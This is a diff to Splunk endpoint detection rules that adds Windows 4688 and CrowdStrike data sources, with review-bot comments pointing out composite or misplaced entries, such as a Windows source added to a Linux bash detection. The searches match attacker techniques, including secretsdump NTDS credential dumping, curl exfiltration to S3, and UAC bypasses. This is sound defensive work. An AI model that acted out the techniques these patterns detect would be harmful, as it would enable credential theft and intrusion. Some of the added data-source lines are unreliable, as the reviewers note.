+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=rundll32.exe
Processes.process= "*user32.dll,LockWorkStation*" by Processes.dest Processes.user
diff --git a/detections/endpoint/rundll32_shimcache_flush.yml b/detections/endpoint/rundll32_shimcache_flush.yml
index b942853036..205e9c912e 100644
--- a/detections/endpoint/rundll32_shimcache_flush.yml
+++ b/detections/endpoint/rundll32_shimcache_flush.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of a suspicious rundll
to cover their tracks and maintain persistence on the compromised machine.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_rundll32` AND Processes.process
= "*apphelp.dll,ShimFlushCache*" by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/rundll32_with_no_command_line_arguments_with_network.yml b/detections/endpoint/rundll32_with_no_command_line_arguments_with_network.yml
index 45e5287cbb..f1fe25961f 100644
--- a/detections/endpoint/rundll32_with_no_command_line_arguments_with_network.yml
+++ b/detections/endpoint/rundll32_with_no_command_line_arguments_with_network.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the execution of rundll32.exe withou
network connections, potentially leading to data exfiltration or further compromise
of the system.
data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 3
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Processes where `process_rundll32` AND Processes.action!="blocked"
by host _time span=1h Processes.process_id Processes.process_name Processes.dest
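Review bot: `Sysmon EventID 1 AND Sysmon EventID 3` packs two data sources into a single list item, whereas `data_source` elsewhere in this batch holds one source per entry. If these entries are resolved by name against data source definitions, a composite string matches none of them, and the two real sources are no longer individually identifiable. Prefer two entries, `- Sysmon EventID 1` and `- Sysmon EventID 3`, with the correlation requirement stated in the description. The same applies to the searchprotocolhost_with_no_command_line_with_network.yml hunk and to suspicious_image_creation_in_appdata_folder.yml, where two existing entries are collapsed into `Sysmon EventID 1 AND Sysmon EventID 11`. The `search` value continues past the hunk.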
diff --git a/detections/endpoint/rundll_loading_dll_by_ordinal.yml b/detections/endpoint/rundll_loading_dll_by_ordinal.yml
index 0bb925c509..d74d961b49 100644
--- a/detections/endpoint/rundll_loading_dll_by_ordinal.yml
+++ b/detections/endpoint/rundll_loading_dll_by_ordinal.yml
@@ -14,6 +14,8 @@ description: The following analytic detects rundll32.exe loading a DLL export fu
privilege escalation, or persistent access within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where `process_rundll32` by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/ryuk_wake_on_lan_command.yml b/detections/endpoint/ryuk_wake_on_lan_command.yml
index 9128468dea..5b33f29853 100644
--- a/detections/endpoint/ryuk_wake_on_lan_command.yml
+++ b/detections/endpoint/ryuk_wake_on_lan_command.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of Wake-on-LAN commands asso
investigation of the affected endpoints are crucial to mitigate the impact.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process="*8 LAN*"
OR Processes.process="*9 REP*") by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/sc_exe_manipulating_windows_services.yml b/detections/endpoint/sc_exe_manipulating_windows_services.yml
index 39f929620a..38342ca70c 100644
--- a/detections/endpoint/sc_exe_manipulating_windows_services.yml
+++ b/detections/endpoint/sc_exe_manipulating_windows_services.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the creation or modification of Wind
a severe threat to the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where Processes.process_name = sc.exe (Processes.process="* create *" OR Processes.process="*
diff --git a/detections/endpoint/scheduled_task_creation_on_remote_endpoint_using_at.yml b/detections/endpoint/scheduled_task_creation_on_remote_endpoint_using_at.yml
index 837dcae27a..37493db23d 100644
--- a/detections/endpoint/scheduled_task_creation_on_remote_endpoint_using_at.yml
+++ b/detections/endpoint/scheduled_task_creation_on_remote_endpoint_using_at.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the creation of scheduled tasks on
or further compromise of the network.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=at.exe
OR Processes.original_file_name=at.exe) (Processes.process=*\\\\*) by Processes.dest
diff --git a/detections/endpoint/scheduled_task_deleted_or_created_via_cmd.yml b/detections/endpoint/scheduled_task_deleted_or_created_via_cmd.yml
index 3087f52f73..15d073384e 100644
--- a/detections/endpoint/scheduled_task_deleted_or_created_via_cmd.yml
+++ b/detections/endpoint/scheduled_task_deleted_or_created_via_cmd.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the creation or deletion of sched
within the environment, posing a significant security risk.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process)
as process values(Processes.parent_process) as parent_process min(_time) as firstTime
max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=schtasks.exe
diff --git a/detections/endpoint/scheduled_task_initiation_on_remote_endpoint.yml b/detections/endpoint/scheduled_task_initiation_on_remote_endpoint.yml
index c0991f8e37..f33cbf68fa 100644
--- a/detections/endpoint/scheduled_task_initiation_on_remote_endpoint.yml
+++ b/detections/endpoint/scheduled_task_initiation_on_remote_endpoint.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of 'schtasks.exe' to start a
leading to further compromise of the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=schtasks.exe
OR Processes.original_file_name=schtasks.exe) (Processes.process= "* /S *" AND Processes.process=*/run*)
diff --git a/detections/endpoint/schtasks_run_task_on_demand.yml b/detections/endpoint/schtasks_run_task_on_demand.yml
index e9f9b1188b..cb789f9f01 100644
--- a/detections/endpoint/schtasks_run_task_on_demand.yml
+++ b/detections/endpoint/schtasks_run_task_on_demand.yml
@@ -16,6 +16,8 @@ description: The following analytic detects the execution of a Windows Scheduled
compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
values(Processes.process_id) as process_id count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "schtasks.exe"
diff --git a/detections/endpoint/schtasks_scheduling_job_on_remote_system.yml b/detections/endpoint/schtasks_scheduling_job_on_remote_system.yml
index 0a0b4544cb..9e3e1f57cd 100644
--- a/detections/endpoint/schtasks_scheduling_job_on_remote_system.yml
+++ b/detections/endpoint/schtasks_scheduling_job_on_remote_system.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of 'schtasks.exe' to create
risk.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = schtasks.exe
OR Processes.original_file_name=schtasks.exe) (Processes.process="*/create*" AND
diff --git a/detections/endpoint/schtasks_used_for_forcing_a_reboot.yml b/detections/endpoint/schtasks_used_for_forcing_a_reboot.yml
index 37ac72a0f1..d1920c9677 100644
--- a/detections/endpoint/schtasks_used_for_forcing_a_reboot.yml
+++ b/detections/endpoint/schtasks_used_for_forcing_a_reboot.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of 'schtasks.exe' to schedul
detection.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where Processes.process_name=schtasks.exe Processes.process="*shutdown*" Processes.process="*/create
diff --git a/detections/endpoint/screensaver_event_trigger_execution.yml b/detections/endpoint/screensaver_event_trigger_execution.yml
index 78ba213d36..2def2d3f72 100644
--- a/detections/endpoint/screensaver_event_trigger_execution.yml
+++ b/detections/endpoint/screensaver_event_trigger_execution.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications to the SCRNSAVE.EXE re
attacker to execute arbitrary code with elevated privileges, leading to further
system compromise and persistent access.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime
max(_time) as lastTime FROM datamodel=Endpoint.Registry where (Registry.registry_path="*\\Control
diff --git a/detections/endpoint/script_execution_via_wmi.yml b/detections/endpoint/script_execution_via_wmi.yml
index d8f42a5cb9..7fc4cc0b69 100644
--- a/detections/endpoint/script_execution_via_wmi.yml
+++ b/detections/endpoint/script_execution_via_wmi.yml
@@ -9,6 +9,8 @@ description: |-
The following analytic detects the execution of scripts via Windows Management Instrumentation (WMI) by monitoring the process 'scrcons.exe'. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events. WMI-based script execution is significant because adversaries often use it to perform malicious activities stealthily, such as system compromise, data exfiltration, or establishing persistence. If confirmed malicious, this activity could allow attackers to execute arbitrary code, escalate privileges, or maintain long-term access to the environment. Analysts should differentiate between legitimate administrative use and potential threats.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=scrcons.exe
by Processes.dest Processes.user Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/sdclt_uac_bypass.yml b/detections/endpoint/sdclt_uac_bypass.yml
index 47ee1614ca..01964f6054 100644
--- a/detections/endpoint/sdclt_uac_bypass.yml
+++ b/detections/endpoint/sdclt_uac_bypass.yml
@@ -15,6 +15,8 @@ description: The following analytic detects suspicious modifications to the sdcl
severe security risk.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time)
diff --git a/detections/endpoint/sdelete_application_execution.yml b/detections/endpoint/sdelete_application_execution.yml
index 69e6542438..9cdfa0fa42 100644
--- a/detections/endpoint/sdelete_application_execution.yml
+++ b/detections/endpoint/sdelete_application_execution.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the sdelete.exe app
response and investigation efforts.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
values(Processes.parent_process) as parent_process values(Processes.process_id)
as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/searchprotocolhost_with_no_command_line_with_network.yml b/detections/endpoint/searchprotocolhost_with_no_command_line_with_network.yml
index 653159cc35..7b62a8a795 100644
--- a/detections/endpoint/searchprotocolhost_with_no_command_line_with_network.yml
+++ b/detections/endpoint/searchprotocolhost_with_no_command_line_with_network.yml
@@ -14,7 +14,7 @@ description: The following analytic detects instances of searchprotocolhost.exe
this activity could allow attackers to establish network connections for command
and control, potentially leading to data exfiltration or further system compromise.
data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 3
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where Processes.process_name=searchprotocolhost.exe by _time span=1h Processes.process_id
Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name
diff --git a/detections/endpoint/secretdumps_offline_ntds_dumping_tool.yml b/detections/endpoint/secretdumps_offline_ntds_dumping_tool.yml
index 45c91d0cb8..2ab87de25b 100644
--- a/detections/endpoint/secretdumps_offline_ntds_dumping_tool.yml
+++ b/detections/endpoint/secretdumps_offline_ntds_dumping_tool.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the potential use of the secretsdump
further lateral movement and potential privilege escalation within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "python*.exe"
Processes.process = "*.py*" Processes.process = "*-ntds*" (Processes.process = "*-system*"
diff --git a/detections/endpoint/serviceprincipalnames_discovery_with_setspn.yml b/detections/endpoint/serviceprincipalnames_discovery_with_setspn.yml
index d16327f89d..780b947022 100644
--- a/detections/endpoint/serviceprincipalnames_discovery_with_setspn.yml
+++ b/detections/endpoint/serviceprincipalnames_discovery_with_setspn.yml
@@ -14,6 +14,8 @@ description: 'The following analytic detects the use of `setspn.exe` to query th
the environment, posing a significant security risk.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_setspn` (Processes.process="*-t*"
AND Processes.process="*-f*") OR (Processes.process="*-q*" AND Processes.process="**/**")
diff --git a/detections/endpoint/services_escalate_exe.yml b/detections/endpoint/services_escalate_exe.yml
index df20d5640f..5ff12df1af 100644
--- a/detections/endpoint/services_escalate_exe.yml
+++ b/detections/endpoint/services_escalate_exe.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of a randomly named
within the network, posing a severe threat to the organization's security.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=services.exe
Processes.process_path=*admin$* by Processes.process_path Processes.dest Processes.user
diff --git a/detections/endpoint/services_lolbas_execution_process_spawn.yml b/detections/endpoint/services_lolbas_execution_process_spawn.yml
index 93510c2490..e1402493f6 100644
--- a/detections/endpoint/services_lolbas_execution_process_spawn.yml
+++ b/detections/endpoint/services_lolbas_execution_process_spawn.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies `services.exe` spawning a LOLBAS
within the environment, posing a severe security risk.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=services.exe)
(Processes.process_name IN ("Regsvcs.exe", "Ftp.exe", "OfflineScannerShell.exe",
diff --git a/detections/endpoint/set_default_powershell_execution_policy_to_unrestricted_or_bypass.yml b/detections/endpoint/set_default_powershell_execution_policy_to_unrestricted_or_bypass.yml
index 84526a6eb9..3b96b3f5bd 100644
--- a/detections/endpoint/set_default_powershell_execution_policy_to_unrestricted_or_bypass.yml
+++ b/detections/endpoint/set_default_powershell_execution_policy_to_unrestricted_or_bypass.yml
@@ -14,6 +14,8 @@ description: The following analytic detects changes to the PowerShell ExecutionP
to further compromise of the system and potential escalation of privileges.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time)
diff --git a/detections/endpoint/shim_database_installation_with_suspicious_parameters.yml b/detections/endpoint/shim_database_installation_with_suspicious_parameters.yml
index d23095f980..44ae46e3bf 100644
--- a/detections/endpoint/shim_database_installation_with_suspicious_parameters.yml
+++ b/detections/endpoint/shim_database_installation_with_suspicious_parameters.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of sdbinst.exe with pa
to the compromised system.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where Processes.process_name = sdbinst.exe by Processes.process_name Processes.parent_process_name
diff --git a/detections/endpoint/silentcleanup_uac_bypass.yml b/detections/endpoint/silentcleanup_uac_bypass.yml
index 06dd984ad7..8aca5c188e 100644
--- a/detections/endpoint/silentcleanup_uac_bypass.yml
+++ b/detections/endpoint/silentcleanup_uac_bypass.yml
@@ -15,6 +15,8 @@ description: The following analytic detects suspicious modifications to the regi
and persistence.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time)
diff --git a/detections/endpoint/single_letter_process_on_endpoint.yml b/detections/endpoint/single_letter_process_on_endpoint.yml
index 9f4b91fe89..bf6039c9e6 100644
--- a/detections/endpoint/single_letter_process_on_endpoint.yml
+++ b/detections/endpoint/single_letter_process_on_endpoint.yml
@@ -9,6 +9,8 @@ description: |-
The following analytic detects processes with names consisting of a single letter, which is often indicative of malware or an attacker attempting to evade detection. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because attackers use such techniques to obscure their presence and carry out malicious activities like data theft or ransomware attacks. If confirmed malicious, this behavior could lead to unauthorized access, data exfiltration, or system compromise. Immediate investigation is required to determine the legitimacy of the process.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes by Processes.dest, Processes.user,
Processes.process, Processes.process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(lastTime)`
diff --git a/detections/endpoint/slui_runas_elevated.yml b/detections/endpoint/slui_runas_elevated.yml
index 4e1704c562..9067232703 100644
--- a/detections/endpoint/slui_runas_elevated.yml
+++ b/detections/endpoint/slui_runas_elevated.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the Microsoft Softw
system changes, data exfiltration, or further compromise of the affected endpoint.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=slui.exe
(Processes.process=*-verb* Processes.process=*runas*) by Processes.dest Processes.user
diff --git a/detections/endpoint/slui_spawning_a_process.yml b/detections/endpoint/slui_spawning_a_process.yml
index 0f60018064..8ae1396e04 100644
--- a/detections/endpoint/slui_spawning_a_process.yml
+++ b/detections/endpoint/slui_spawning_a_process.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the Microsoft Software Licensing Use
compromising the system's security and gaining unauthorized access.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=slui.exe
by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/spoolsv_spawning_rundll32.yml b/detections/endpoint/spoolsv_spawning_rundll32.yml
index a368a4bb44..3fb7053870 100644
--- a/detections/endpoint/spoolsv_spawning_rundll32.yml
+++ b/detections/endpoint/spoolsv_spawning_rundll32.yml
@@ -16,6 +16,8 @@ description: The following analytic detects the spawning of `rundll32.exe` witho
endpoint.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=spoolsv.exe
`process_rundll32` by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/spoolsv_writing_a_dll.yml b/detections/endpoint/spoolsv_writing_a_dll.yml
index 72a318e110..476e83b162 100644
--- a/detections/endpoint/spoolsv_writing_a_dll.yml
+++ b/detections/endpoint/spoolsv_writing_a_dll.yml
@@ -15,6 +15,8 @@ description: The following analytic detects `spoolsv.exe` writing a `.dll` file,
system compromise. Immediate endpoint isolation and further investigation are recommended.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
- Sysmon EventID 11
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where Processes.process_name=spoolsv.exe by _time Processes.process_guid Processes.process_name
diff --git a/detections/endpoint/spoolsv_writing_a_dll___sysmon.yml b/detections/endpoint/spoolsv_writing_a_dll___sysmon.yml
index 66efe10da1..e65673de82 100644
--- a/detections/endpoint/spoolsv_writing_a_dll___sysmon.yml
+++ b/detections/endpoint/spoolsv_writing_a_dll___sysmon.yml
@@ -7,7 +7,7 @@ status: production
type: TTP
description: The following analytic detects `spoolsv.exe` writing a `.dll` file, which
is unusual behavior and may indicate exploitation of vulnerabilities like CVE-2021-34527
- (PrintNightmare). This detection leverages Sysmon Event ID 11 to monitor file creation
+ (PrintNightmare). This detection leverages Sysmon EventID 11 to monitor file creation
events in the `\spool\drivers\x64\` directory. This activity is significant because
`spoolsv.exe` typically does not write DLL files, and such behavior could signify
an ongoing attack. If confirmed malicious, this could allow an attacker to execute
diff --git a/detections/endpoint/sunburst_correlation_dll_and_network_event.yml b/detections/endpoint/sunburst_correlation_dll_and_network_event.yml
index d52b748e83..227e15f570 100644
--- a/detections/endpoint/sunburst_correlation_dll_and_network_event.yml
+++ b/detections/endpoint/sunburst_correlation_dll_and_network_event.yml
@@ -7,7 +7,7 @@ status: experimental
type: TTP
description: The following analytic identifies the loading of the malicious SolarWinds.Orion.Core.BusinessLayer.dll
by SolarWinds.BusinessLayerHost.exe and subsequent DNS queries to avsvmcloud.com.
- It uses Sysmon Event ID 7 for DLL loading and Event ID 22 for DNS queries, correlating
+ It uses Sysmon EventID 7 for DLL loading and Event ID 22 for DNS queries, correlating
these events within a 12-14 day period. This activity is significant as it indicates
potential Sunburst malware infection, a known supply chain attack. If confirmed
malicious, this could lead to unauthorized network access, data exfiltration, and
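Review bot: Only the first of the two event-id mentions on the changed line was normalized; it now reads `Sysmon EventID 7 for DLL loading and Event ID 22 for DNS queries`, leaving the old spelling for the DNS event. For consistency with the rest of this batch, change the line to `It uses Sysmon EventID 7 for DLL loading and Sysmon EventID 22 for DNS queries, correlating`. The description continues past the hunk.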
diff --git a/detections/endpoint/suspicious_copy_on_system32.yml b/detections/endpoint/suspicious_copy_on_system32.yml
index bb76235f6b..0bf17e0415 100644
--- a/detections/endpoint/suspicious_copy_on_system32.yml
+++ b/detections/endpoint/suspicious_copy_on_system32.yml
@@ -15,6 +15,8 @@ description: The following analytic detects suspicious file copy operations from
within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
IN("cmd.exe", "powershell*","pwsh.exe", "sqlps.exe", "sqltoolsps.exe", "powershell_ise.exe")
diff --git a/detections/endpoint/suspicious_curl_network_connection.yml b/detections/endpoint/suspicious_curl_network_connection.yml
index f4a1e56f14..bb7ade140e 100644
--- a/detections/endpoint/suspicious_curl_network_connection.yml
+++ b/detections/endpoint/suspicious_curl_network_connection.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of the curl command contacti
to maintain control over the compromised system and deploy additional payloads.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=curl
Processes.process=s3.amazonaws.com by Processes.dest Processes.user Processes.parent_process
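Review bot: `Windows Event Log Security 4688` is a Windows Security log source, yet this search looks for a process named `curl` with no `.exe` suffix, which suggests a Linux or macOS host where 4688 does not exist; if that reading is right, the new entry claims coverage that cannot occur. The same mismatch is unambiguous in the suspicious_linux_discovery_commands.yml hunk later in this diff, whose description is about bash commands. In both cases the 4688 entry should be dropped, or the detection's platform should be stated so the data source list can be checked against it. The `search` value continues past the hunk.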
diff --git a/detections/endpoint/suspicious_dllhost_no_command_line_arguments.yml b/detections/endpoint/suspicious_dllhost_no_command_line_arguments.yml
index e3b117d33e..b8135a973c 100644
--- a/detections/endpoint/suspicious_dllhost_no_command_line_arguments.yml
+++ b/detections/endpoint/suspicious_dllhost_no_command_line_arguments.yml
@@ -15,6 +15,8 @@ description: The following analytic detects instances of DLLHost.exe executing w
dumping or file manipulation, posing a severe threat to the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where `process_dllhost` by _time span=1h Processes.process_id Processes.process_name
Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name
diff --git a/detections/endpoint/suspicious_gpupdate_no_command_line_arguments.yml b/detections/endpoint/suspicious_gpupdate_no_command_line_arguments.yml
index 577c14d002..e65674f175 100644
--- a/detections/endpoint/suspicious_gpupdate_no_command_line_arguments.yml
+++ b/detections/endpoint/suspicious_gpupdate_no_command_line_arguments.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of gpupdate.exe withou
or lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where `process_gpupdate` by _time span=1h Processes.process_id Processes.process_name
Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name
diff --git a/detections/endpoint/suspicious_icedid_rundll32_cmdline.yml b/detections/endpoint/suspicious_icedid_rundll32_cmdline.yml
index 0623f65c76..2d5cb01f68 100644
--- a/detections/endpoint/suspicious_icedid_rundll32_cmdline.yml
+++ b/detections/endpoint/suspicious_icedid_rundll32_cmdline.yml
@@ -14,6 +14,8 @@ description: The following analytic detects a suspicious `rundll32.exe` command
to further system compromise and potential data exfiltration.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*/i:*
by Processes.process_name Processes.process Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/suspicious_image_creation_in_appdata_folder.yml b/detections/endpoint/suspicious_image_creation_in_appdata_folder.yml
index efed22edca..fe52632afb 100644
--- a/detections/endpoint/suspicious_image_creation_in_appdata_folder.yml
+++ b/detections/endpoint/suspicious_image_creation_in_appdata_folder.yml
@@ -14,8 +14,7 @@ description: The following analytic detects the creation of image files in the A
malicious, this activity could indicate unauthorized data capture and exfiltration,
compromising sensitive information and user privacy.
data_source:
-- Sysmon EventID 1
-- Sysmon EventID 11
+- Sysmon EventID 1 AND Sysmon EventID 11
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where Processes.process_name=*.exe Processes.process_path="*\\appdata\\Roaming\\*"
by _time span=1h Processes.process_id Processes.process_name Processes.process Processes.dest
diff --git a/detections/endpoint/suspicious_linux_discovery_commands.yml b/detections/endpoint/suspicious_linux_discovery_commands.yml
index b1d9d22a6d..c71814a399 100644
--- a/detections/endpoint/suspicious_linux_discovery_commands.yml
+++ b/detections/endpoint/suspicious_linux_discovery_commands.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the execution of suspicious bash co
a severe threat to the environment.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process)
values(Processes.process_name) values(Processes.parent_process_name) dc(Processes.process)
as distinct_commands dc(Processes.process_name) as distinct_process_names min(_time)
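Review bot: `Windows Event Log Security 4688` is a Windows-only process-creation event and cannot be a source for a detection of suspicious bash discovery commands on Linux, so the added line misdescribes where this analytic can run. CrowdStrike ProcessRollup2 does cover Linux hosts and is a reasonable addition, but Sysmon EventID 1 here presumably refers to Sysmon for Linux, which is already the existing entry. I would drop the 4688 line and keep `- Sysmon EventID 1` and `- CrowdStrike ProcessRollup2`, since an incorrect `data_source` will be surfaced to users as a supported log source. The tail of the `search` is outside this hunk.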
diff --git a/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml b/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml
index 48390203df..31643cf1fe 100644
--- a/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml
+++ b/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the renaming of microsoft.workflow.c
potentially leading to privilege escalation or persistent access within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name!=microsoft.workflow.compiler.exe
AND Processes.original_file_name=Microsoft.Workflow.Compiler.exe by Processes.dest
